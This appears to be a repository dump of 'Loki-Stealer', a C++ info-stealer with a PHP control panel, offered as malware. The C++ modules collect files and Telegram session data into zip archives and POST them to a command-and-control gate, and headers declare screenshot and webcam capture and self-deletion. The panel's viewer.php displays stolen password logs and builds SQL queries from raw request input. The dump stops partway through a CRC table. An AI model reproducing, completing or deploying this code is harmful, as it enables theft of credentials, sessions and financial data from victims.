├── Panel ├── assets │ ├── index.html │ ├── css │ │ ├── index.html │ │ └── switch.css │ ├── GeoIP │ │ ├── index.html │ │ ├── geoip.dat │ │ └── geoip.php │ └── xenforo-logo.png ├── logs │ └── index.html ├── tmp │ └── index.html ├── stealer │ └── get_url.txt ├── auth.php ├── functions.php ├── url.php ├── viewer.php ├── converter.php ├── loader.php ├── install.php ├── gate.php └── index.php ├── Source ├── LokiStealer │ ├── ldr.h │ ├── Cred.h │ ├── CNC.h │ ├── Telegram.h │ ├── Search.h │ ├── Parse.h │ ├── LokiStealer.vcxproj.user │ ├── Export.h │ ├── vector.h │ ├── mem.cpp │ ├── mem.h │ ├── Fncs.h │ ├── vector.cpp │ ├── Search.cpp │ ├── CNC.cpp │ ├── Parse.cpp │ ├── Telegram.cpp │ ├── LokiStealer.vcxproj.filters │ ├── crypt.h │ ├── Export.cpp │ ├── Ldr.cpp │ ├── Cred.cpp │ ├── crypt.cpp │ ├── LokiStealer.vcxproj │ ├── Fncs.cpp │ ├── zip.h │ ├── parson.h │ └── Source.cpp └── LokiStealer.sln └── README.md /Panel/assets/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/logs/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/tmp/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/assets/css/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/assets/GeoIP/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Source/LokiStealer/ldr.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | void runLdr(); -------------------------------------------------------------------------------- /Panel/stealer/get_url.txt: -------------------------------------------------------------------------------- 1 | 1cb7b78acb7b698de4346095739a2ecb 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Loki-Stealer 2 | C++ stealer (passwords, cookies, forms, cards, wallets) 3 | -------------------------------------------------------------------------------- /Panel/assets/GeoIP/geoip.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecUser1/Loki-Stealer/HEAD/Panel/assets/GeoIP/geoip.dat -------------------------------------------------------------------------------- /Panel/assets/xenforo-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecUser1/Loki-Stealer/HEAD/Panel/assets/xenforo-logo.png -------------------------------------------------------------------------------- /Source/LokiStealer/Cred.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | void enumCredentials(vector* file, SIZE_T* count); -------------------------------------------------------------------------------- /Source/LokiStealer/CNC.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | void sendLogsToCNC(LPCWSTR GetLink, CHAR* base64Logs, SIZE_T logsSize); -------------------------------------------------------------------------------- /Source/LokiStealer/Telegram.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "zip.h" 4 | 5 | void enumTelegram(HZIP hZip, LPCWSTR dirPath, SIZE_T* telegram); -------------------------------------------------------------------------------- /Source/LokiStealer/Search.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "vector.h" 4 | #include "crypt.h" 5 | 6 | void searchImpl(LPCWSTR dirPath, vector* v, uint32_t search_name); -------------------------------------------------------------------------------- /Source/LokiStealer/Parse.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "zip.h" 3 | 4 | void parserImpl(LPCWSTR list[], SIZE_T* count, SIZE_T size, LPCWSTR prefix, BOOL checkArray, HZIP hZip, LPCWSTR dirPath, BOOL checkSize = FALSE); -------------------------------------------------------------------------------- /Source/LokiStealer/LokiStealer.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Source/LokiStealer/Export.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "vector.h" 4 | 5 | void vec_get_str(vector v, CHAR** c, SIZE_T* s, SIZE_T prefix_len); 6 | vector sqliteProcessFunction(LPCWSTR dbPath, SIZE_T* count_value, LPCSTR query, LPCSTR endstr, int addrn, int count, int encrypted_columns[], char* columns_prefix[], int encrypted_columns_count); -------------------------------------------------------------------------------- /Source/LokiStealer/vector.h: -------------------------------------------------------------------------------- 1 | #ifndef VECTOR_H__ 2 | #define VECTOR_H__ 3 | 4 | typedef struct vector_ { 5 | void** data; 6 | int size; 7 | int count; 8 | } vector; 9 | 10 | void vector_init(vector*); 11 | int vector_count(vector*); 12 | void vector_add(vector*, void*); 13 | void vector_set(vector*, int, void*); 14 | void *vector_get(vector*, int); 15 | void vector_delete(vector*, int); 16 | void vector_free(vector*); 17 | 18 | #endif -------------------------------------------------------------------------------- /Source/LokiStealer/mem.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "mem.h" 3 | 4 | int _cmp(const void *m1, const void *m2, SIZE_T size) 5 | { 6 | BYTE *BM1 = (BYTE*)m1; 7 | BYTE *BM2 = (BYTE*)m2; 8 | for (; size--; ++BM1, ++BM2) if (*BM1 != *BM2) return (*BM1 - *BM2); 9 | return NULL; 10 | } 11 | 12 | void _copy(void* dst, void* src, SIZE_T size) { 13 | for (SIZE_T memccpy = 0; memccpy < size; ++memccpy) ((LPBYTE)(dst))[memccpy] = ((LPBYTE)(src))[memccpy]; 14 | } -------------------------------------------------------------------------------- /Source/LokiStealer/mem.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | #define _alloc(size) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size + 64) 5 | #define _free(mem) if (mem) HeapFree(GetProcessHeap(), 0, mem) 6 | #define _set(mem, c, size) for (SIZE_T memcset = 0; memcset < size; ++memcset) { ((LPBYTE)mem)[memcset] = c; if (!memcset) memcset = 0; } 7 | #define _zero(mem, size) _set(mem, 0, size) 8 | void _copy(void* dst, void* src, SIZE_T size); 9 | int _cmp(const void *m1, const void *m2, SIZE_T size); -------------------------------------------------------------------------------- /Panel/auth.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Source/LokiStealer/Fncs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | #define ADMIN_PANEL L"#LINK#" 5 | #define API_URL L"gate.php" 6 | #define LDR_URL "/ldr.php" 7 | 8 | void randomInt(SIZE_T* out, int from, int to); 9 | LPCWSTR resolveEnvrimoment(const WCHAR* env); 10 | BOOL pathExists(LPCWSTR path, BOOL isFile); 11 | LPCWSTR bitGetHostByName(LPCWSTR domain); 12 | int captureScreenshot(LPCWSTR szFile); 13 | void captureCam(WCHAR* szPath); 14 | void CryptGenKey(BYTE** data); 15 | LPCWSTR getSystemInfoW(); 16 | void selfDestruct(); 17 | LPCSTR genCountry(); 18 | CHAR* randKey(); -------------------------------------------------------------------------------- /Panel/functions.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/url.php: -------------------------------------------------------------------------------- 1 |

Ваша ссылка для бота


"; 23 | echo "http://".$_SERVER['HTTP_HOST']."/stealer"."=".$hash.""; 24 | ?> -------------------------------------------------------------------------------- /Panel/viewer.php: -------------------------------------------------------------------------------- 1 | query("SELECT id, hwid FROM `logs` WHERE id = ".$password)->fetch(PDO::FETCH_ASSOC); 8 | $file = str_replace("\n","
",file_get_contents('logs/'.$f['hwid'].'/passwords.log')); 9 | if($file==""){ 10 | echo "Nothing"; 11 | }else{ 12 | echo $file; 13 | } 14 | }else if(isset($_GET['browsers'])){ 15 | $browsers = $_GET['browsers']; 16 | $f = $pdoConnection->query("SELECT id, hwid FROM `logs` WHERE id = ".$browsers)->fetch(PDO::FETCH_ASSOC); 17 | if(isset($_GET['file'])){ 18 | $file = str_replace("\n","
",file_get_contents('logs/'.$f['hwid'].'/Browsers/'.$_GET['file'])); 19 | if($file==""){ 20 | echo "Nothing"; 21 | }else{ 22 | echo $file; 23 | } 24 | die(); 25 | } 26 | if(file_exists("logs/".$f['hwid']."/Browsers")) $dir = scandir("logs/".$f['hwid']."/Browsers"); else echo "Nothing"; 27 | foreach($dir as $file){ 28 | echo ''.$file.'
'; 29 | } 30 | } 31 | ?> -------------------------------------------------------------------------------- /Source/LokiStealer/vector.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "vector.h" 4 | #include "mem.h" 5 | 6 | void vector_init(vector *v) 7 | { 8 | v->data = NULL; 9 | v->size = 0; 10 | v->count = 0; 11 | } 12 | 13 | int vector_count(vector *v) 14 | { 15 | return v->count; 16 | } 17 | 18 | void vector_add(vector *v, void *e) 19 | { 20 | if (v->size == 0) { 21 | v->size = 10; 22 | v->data = (void**)malloc(sizeof(void*) * v->size); 23 | memset(v->data, '\0', sizeof(void*) * v->size); 24 | } 25 | 26 | if (v->size == v->count) { 27 | v->size *= 2; 28 | v->data = (void**)realloc(v->data, sizeof(void*) * v->size); 29 | } 30 | 31 | v->data[v->count] = e; 32 | v->count++; 33 | } 34 | 35 | void vector_set(vector *v, int index, void *e) 36 | { 37 | if (index >= v->count) { 38 | return; 39 | } 40 | 41 | v->data[index] = e; 42 | } 43 | 44 | void *vector_get(vector *v, int index) 45 | { 46 | if (index >= v->count) { 47 | return 0; 48 | } 49 | 50 | return v->data[index]; 51 | } 52 | 53 | void vector_delete(vector *v, int index) 54 | { 55 | if (index >= v->count) { 56 | return; 57 | } 58 | for (int i = index + 1, j = index; i < v->count; ++i) { 59 | v->data[j] = v->data[i]; 60 | ++j; 61 | } 62 | v->count--; 63 | } 64 | 65 | void vector_free(vector *v) 66 | { 67 | free(v->data); 68 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Search.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "search.h" 4 | #include "vector.h" 5 | #include "crypt.h" 6 | #include "mem.h" 7 | #define FILE_ATTRIBUTES (FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM) 8 | 9 | void searchImpl(LPCWSTR dirPath, vector* v, uint32_t search_name) 10 | { 11 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 12 | { 13 | WIN32_FIND_DATAW fd; 14 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 15 | HANDLE hIter = FindFirstFileW(strDir, &fd); 16 | if (hIter != INVALID_HANDLE_VALUE) 17 | { 18 | SIZE_T pos = -1; 19 | do 20 | { 21 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 22 | if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY && lstrcmpW(fd.cFileName, L".") != 0 && lstrcmpW(fd.cFileName, L"..") != 0) 23 | { 24 | searchImpl(strDir, v, search_name); 25 | } 26 | else if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 27 | { 28 | WCHAR* fn = PathFindFileNameW(strDir); 29 | if (crc(fn, lstrlenW(fn)) == search_name) { 30 | WCHAR* mem = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 31 | 32 | lstrcpyW(mem, strDir); 33 | vector_add(v, mem); 34 | } 35 | } 36 | } while (FindNextFileW(hIter, &fd)); 37 | FindClose(hIter); 38 | } 39 | 40 | _free(strDir); 41 | } 42 | } -------------------------------------------------------------------------------- /Panel/assets/css/switch.css: -------------------------------------------------------------------------------- 1 | /* The switch - the box around the slider */ 2 | .switch { 3 | position: relative; 4 | display: inline-block; 5 | width: 60px; 6 | height: 34px; 7 | } 8 | 9 | /* Hide default HTML checkbox */ 10 | .switch input { 11 | opacity: 0; 12 | width: 0; 13 | height: 0; 14 | } 15 | 16 | /* The slider */ 17 | .slider { 18 | position: absolute; 19 | cursor: pointer; 20 | top: 0; 21 | left: 0; 22 | right: 0; 23 | bottom: 0; 24 | background-color: #ccc; 25 | -webkit-transition: .4s; 26 | transition: .4s; 27 | } 28 | 29 | .slider:before { 30 | position: absolute; 31 | content: ""; 32 | height: 26px; 33 | width: 26px; 34 | left: 4px; 35 | bottom: 4px; 36 | background-color: white; 37 | -webkit-transition: .4s; 38 | transition: .4s; 39 | } 40 | 41 | input:checked + .slider { 42 | background-color: #2196F3; 43 | } 44 | 45 | input:focus + .slider { 46 | box-shadow: 0 0 1px #2196F3; 47 | } 48 | 49 | input:checked + .slider:before { 50 | -webkit-transform: translateX(26px); 51 | -ms-transform: translateX(26px); 52 | transform: translateX(26px); 53 | } 54 | 55 | /* Rounded sliders */ 56 | .slider.round { 57 | border-radius: 34px; 58 | } 59 | 60 | .slider.round:before { 61 | border-radius: 50%; 62 | } 63 | 64 | .collumn{ 65 | float:left; 66 | width:25%; 67 | } 68 | 69 | .x300 { 70 | width:300%; 71 | } 72 | 73 | .buttonsBlock{ 74 | clear:both; 75 | } -------------------------------------------------------------------------------- /Source/LokiStealer/CNC.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "crypt.h" 7 | #include "fncs.h" 8 | #include "cnc.h" 9 | #include "mem.h" 10 | 11 | #pragma comment(lib, "wininet.lib") 12 | #pragma comment(lib, "shlwapi.lib") 13 | 14 | void sendLogsToCNC(LPCWSTR GetLink, CHAR* base64Logs, SIZE_T logsSize) { 15 | LPCWSTR actual_domain = ADMIN_PANEL; 16 | 17 | SIZE_T outsize; 18 | LPCSTR param = base64Encode((LPBYTE)base64Logs, logsSize, &outsize); 19 | 20 | CHAR* szReq = (CHAR*)_alloc(outsize + 6); 21 | wnsprintfA(szReq, outsize + 6, "logs=%s", param); 22 | 23 | HINTERNET hIntSession = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 24 | 25 | HINTERNET hHttpSession = InternetConnectW(hIntSession, actual_domain, 80, 0, 0, INTERNET_SERVICE_HTTP, 0, NULL); 26 | 27 | HINTERNET hHttpRequest = HttpOpenRequestW( 28 | hHttpSession, 29 | L"POST", 30 | GetLink, 31 | 0, 0, 0, INTERNET_FLAG_RELOAD, 0); 32 | 33 | const WCHAR* szHeaders = L"Content-Type: application/x-www-form-urlencoded"; 34 | if (!HttpSendRequestW(hHttpRequest, szHeaders, lstrlenW(szHeaders), (CHAR*)szReq, lstrlenA(szReq))) { 35 | return; 36 | } 37 | 38 | InternetCloseHandle(hHttpRequest); 39 | InternetCloseHandle(hHttpSession); 40 | InternetCloseHandle(hIntSession); 41 | _free((CHAR*)param); 42 | } -------------------------------------------------------------------------------- /Source/LokiStealer.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33122.133 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LokiStealer", "LokiStealer\LokiStealer.vcxproj", "{56647C63-4E31-4AB6-8C1A-6819A7A7C698}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x64.ActiveCfg = Debug|x64 17 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x64.Build.0 = Debug|x64 18 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x86.ActiveCfg = Debug|Win32 19 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x86.Build.0 = Debug|Win32 20 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x64.ActiveCfg = Release|x64 21 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x64.Build.0 = Release|x64 22 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x86.ActiveCfg = Release|Win32 23 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {A3BE3387-15B5-49F7-A584-C57E0C3A1140} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Source/LokiStealer/Parse.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "parse.h" 4 | #include "mem.h" 5 | #include "zip.h" 6 | #define FILE_ATTRIBUTES (FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM) 7 | 8 | LONGLONG FileSize(const wchar_t* name) 9 | { 10 | WIN32_FILE_ATTRIBUTE_DATA fad; 11 | if (!GetFileAttributesEx(name, GetFileExInfoStandard, &fad)) 12 | return -1; // error condition, could call GetLastError to find out more 13 | LARGE_INTEGER size; 14 | size.HighPart = fad.nFileSizeHigh; 15 | size.LowPart = fad.nFileSizeLow; 16 | return size.QuadPart; 17 | } 18 | 19 | void parserImpl(LPCWSTR list[], SIZE_T* count, SIZE_T size, LPCWSTR prefix, BOOL checkArray, HZIP hZip, LPCWSTR dirPath, BOOL checkSize) 20 | { 21 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 22 | { 23 | WIN32_FIND_DATAW fd; 24 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 25 | HANDLE hIter = FindFirstFileW(strDir, &fd); 26 | if (hIter != INVALID_HANDLE_VALUE) 27 | { 28 | do 29 | { 30 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 31 | if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY && lstrcmpW(fd.cFileName, L".") != 0 && lstrcmpW(fd.cFileName, L"..") != 0) 32 | { 33 | parserImpl(list, count, size, prefix, checkArray, hZip, strDir); 34 | } 35 | else if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 36 | { 37 | if (checkArray) { 38 | for(SIZE_T i = 0; i < size; i++){ 39 | if (StrStrW(fd.cFileName, list[i]) != 0) { 40 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4) * sizeof(WCHAR)); 41 | wnsprintfW(zipName, lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4, L"%s\\%s", prefix, fd.cFileName); 42 | 43 | if (checkSize) if (FileSize(strDir) < (1024 * 1024 * 2)) 44 | ZipAdd(hZip, zipName, strDir); 45 | else 46 | ZipAdd(hZip, zipName, strDir); 47 | 48 | *count += 1; 49 | _free(zipName); 50 | } 51 | } 52 | } 53 | else { 54 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4) * sizeof(WCHAR)); 55 | wnsprintfW(zipName, lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4, L"%s\\%s", prefix, fd.cFileName); 56 | ZipAdd(hZip, zipName, strDir); 57 | 58 | *count += 1; 59 | _free(zipName); 60 | } 61 | } 62 | } while (FindNextFileW(hIter, &fd)); 63 | FindClose(hIter); 64 | } 65 | _free(strDir); 66 | } 67 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Telegram.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "Telegram.h" 4 | #include "fncs.h" 5 | #include "mem.h" 6 | #include "zip.h" 7 | #define FILE_ATTRIBUTES (FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM) 8 | 9 | void _processSubTg(HZIP hZip, LPCWSTR dirPath, LPCWSTR appd) { 10 | if (pathExists(dirPath, FALSE)) { 11 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 12 | { 13 | WIN32_FIND_DATAW fd; 14 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 15 | HANDLE hIter = FindFirstFileW(strDir, &fd); 16 | if (hIter != INVALID_HANDLE_VALUE) 17 | { 18 | do 19 | { 20 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 21 | if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 22 | { 23 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(PathFindFileNameW(strDir)) + 11 + lstrlenW(appd)) * sizeof(WCHAR)); 24 | wnsprintfW(zipName, lstrlenW(PathFindFileNameW(strDir)) + 11 + lstrlenW(appd), L"Telegram\\%s\\%s", appd, PathFindFileNameW(strDir)); 25 | ZipAdd(hZip, zipName, strDir); 26 | _free(zipName); 27 | } 28 | } while (FindNextFileW(hIter, &fd)); 29 | FindClose(hIter); 30 | } 31 | _free(strDir); 32 | } 33 | } 34 | } 35 | 36 | void enumTelegram(HZIP hZip, LPCWSTR dirPath, SIZE_T* telegram) { 37 | if (pathExists(dirPath, FALSE)) { 38 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 39 | { 40 | WIN32_FIND_DATAW fd; 41 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 42 | HANDLE hIter = FindFirstFileW(strDir, &fd); 43 | if (hIter != INVALID_HANDLE_VALUE) 44 | { 45 | do 46 | { 47 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 48 | if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY && lstrcmpW(fd.cFileName, L".") != 0 && lstrcmpW(fd.cFileName, L"..") != 0) 49 | { 50 | if (StrStrW(PathFindFileNameW(strDir), L"D877F783D5D3EF8C")) { 51 | WCHAR* mPath = (WCHAR*)_alloc((11 + lstrlenW(PathFindFileNameW(strDir))) * sizeof(WCHAR)); 52 | wnsprintfW(mPath, (11 + lstrlenW(PathFindFileNameW(strDir))), L"Telegram\\%s", PathFindFileNameW(strDir)); 53 | ZipAddFolder(hZip, mPath); 54 | _processSubTg(hZip, strDir, PathFindFileNameW(strDir)); 55 | _free(mPath); 56 | *telegram += 1; 57 | } 58 | enumTelegram(hZip, strDir, telegram); 59 | } 60 | else if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 61 | { 62 | if (StrStrW(PathFindFileNameW(strDir), L"D877F783D5D3EF8C")) { 63 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(PathFindFileNameW(strDir)) + 10) * sizeof(WCHAR)); 64 | wnsprintfW(zipName, lstrlenW(PathFindFileNameW(strDir)) + 10, L"%s%s", L"Telegram\\", PathFindFileNameW(strDir)); 65 | ZipAdd(hZip, zipName, strDir); 66 | 67 | _free(zipName); 68 | } 69 | } 70 | } while (FindNextFileW(hIter, &fd)); 71 | FindClose(hIter); 72 | } 73 | _free(strDir); 74 | } 75 | } 76 | } -------------------------------------------------------------------------------- /Source/LokiStealer/LokiStealer.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | Source Files 38 | 39 | 40 | Source Files 41 | 42 | 43 | Source Files 44 | 45 | 46 | Source Files 47 | 48 | 49 | Source Files 50 | 51 | 52 | Source Files 53 | 54 | 55 | Source Files 56 | 57 | 58 | Source Files 59 | 60 | 61 | Source Files 62 | 63 | 64 | 65 | 66 | Header Files 67 | 68 | 69 | Header Files 70 | 71 | 72 | Header Files 73 | 74 | 75 | Header Files 76 | 77 | 78 | Header Files 79 | 80 | 81 | Header Files 82 | 83 | 84 | Header Files 85 | 86 | 87 | Header Files 88 | 89 | 90 | Header Files 91 | 92 | 93 | Header Files 94 | 95 | 96 | Header Files 97 | 98 | 99 | Header Files 100 | 101 | 102 | Header Files 103 | 104 | 105 | Header Files 106 | 107 | 108 | -------------------------------------------------------------------------------- /Panel/converter.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | Converter 11 | 12 | 13 | 15 | 16 | 17 | 18 |
19 |
20 |
21 | 48 |
49 |
50 |
51 | 52 | 91 |
92 |
93 |
94 |
95 |
96 |
97 |

NETSCAPE:

98 | 100 |
101 | 102 |
103 |
104 |

JSON:

105 | 107 |
108 |
109 |
110 |
111 |
112 |
-------------------------------------------------------------------------------- /Source/LokiStealer/crypt.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | LPCSTR genHwid(); 6 | LPSTR base64Encode(LPBYTE source, SIZE_T sourceSize, SIZE_T *destSize); 7 | void TRAFFIC_ENCRYPT(unsigned char S[256], unsigned char* data, int data_len); 8 | 9 | namespace crcdetail 10 | { 11 | static constexpr const uint32_t table[256] = 12 | { 13 | 0x00000000U, 0x77073096U, 0xEE0E612CU, 0x990951BAU, 0x076DC419U, 14 | 0x706AF48FU, 0xE963A535U, 0x9E6495A3U, 0x0EDB8832U, 0x79DCB8A4U, 15 | 0xE0D5E91EU, 0x97D2D988U, 0x09B64C2BU, 0x7EB17CBDU, 0xE7B82D07U, 16 | 0x90BF1D91U, 0x1DB71064U, 0x6AB020F2U, 0xF3B97148U, 0x84BE41DEU, 17 | 0x1ADAD47DU, 0x6DDDE4EBU, 0xF4D4B551U, 0x83D385C7U, 0x136C9856U, 18 | 0x646BA8C0U, 0xFD62F97AU, 0x8A65C9ECU, 0x14015C4FU, 0x63066CD9U, 19 | 0xFA0F3D63U, 0x8D080DF5U, 0x3B6E20C8U, 0x4C69105EU, 0xD56041E4U, 20 | 0xA2677172U, 0x3C03E4D1U, 0x4B04D447U, 0xD20D85FDU, 0xA50AB56BU, 21 | 0x35B5A8FAU, 0x42B2986CU, 0xDBBBC9D6U, 0xACBCF940U, 0x32D86CE3U, 22 | 0x45DF5C75U, 0xDCD60DCFU, 0xABD13D59U, 0x26D930ACU, 0x51DE003AU, 23 | 0xC8D75180U, 0xBFD06116U, 0x21B4F4B5U, 0x56B3C423U, 0xCFBA9599U, 24 | 0xB8BDA50FU, 0x2802B89EU, 0x5F058808U, 0xC60CD9B2U, 0xB10BE924U, 25 | 0x2F6F7C87U, 0x58684C11U, 0xC1611DABU, 0xB6662D3DU, 0x76DC4190U, 26 | 0x01DB7106U, 0x98D220BCU, 0xEFD5102AU, 0x71B18589U, 0x06B6B51FU, 27 | 0x9FBFE4A5U, 0xE8B8D433U, 0x7807C9A2U, 0x0F00F934U, 0x9609A88EU, 28 | 0xE10E9818U, 0x7F6A0DBBU, 0x086D3D2DU, 0x91646C97U, 0xE6635C01U, 29 | 0x6B6B51F4U, 0x1C6C6162U, 0x856530D8U, 0xF262004EU, 0x6C0695EDU, 30 | 0x1B01A57BU, 0x8208F4C1U, 0xF50FC457U, 0x65B0D9C6U, 0x12B7E950U, 31 | 0x8BBEB8EAU, 0xFCB9887CU, 0x62DD1DDFU, 0x15DA2D49U, 0x8CD37CF3U, 32 | 0xFBD44C65U, 0x4DB26158U, 0x3AB551CEU, 0xA3BC0074U, 0xD4BB30E2U, 33 | 0x4ADFA541U, 0x3DD895D7U, 0xA4D1C46DU, 0xD3D6F4FBU, 0x4369E96AU, 34 | 0x346ED9FCU, 0xAD678846U, 0xDA60B8D0U, 0x44042D73U, 0x33031DE5U, 35 | 0xAA0A4C5FU, 0xDD0D7CC9U, 0x5005713CU, 0x270241AAU, 0xBE0B1010U, 36 | 0xC90C2086U, 0x5768B525U, 0x206F85B3U, 0xB966D409U, 0xCE61E49FU, 37 | 0x5EDEF90EU, 0x29D9C998U, 0xB0D09822U, 0xC7D7A8B4U, 0x59B33D17U, 38 | 0x2EB40D81U, 0xB7BD5C3BU, 0xC0BA6CADU, 0xEDB88320U, 0x9ABFB3B6U, 39 | 0x03B6E20CU, 0x74B1D29AU, 0xEAD54739U, 0x9DD277AFU, 0x04DB2615U, 40 | 0x73DC1683U, 0xE3630B12U, 0x94643B84U, 0x0D6D6A3EU, 0x7A6A5AA8U, 41 | 0xE40ECF0BU, 0x9309FF9DU, 0x0A00AE27U, 0x7D079EB1U, 0xF00F9344U, 42 | 0x8708A3D2U, 0x1E01F268U, 0x6906C2FEU, 0xF762575DU, 0x806567CBU, 43 | 0x196C3671U, 0x6E6B06E7U, 0xFED41B76U, 0x89D32BE0U, 0x10DA7A5AU, 44 | 0x67DD4ACCU, 0xF9B9DF6FU, 0x8EBEEFF9U, 0x17B7BE43U, 0x60B08ED5U, 45 | 0xD6D6A3E8U, 0xA1D1937EU, 0x38D8C2C4U, 0x4FDFF252U, 0xD1BB67F1U, 46 | 0xA6BC5767U, 0x3FB506DDU, 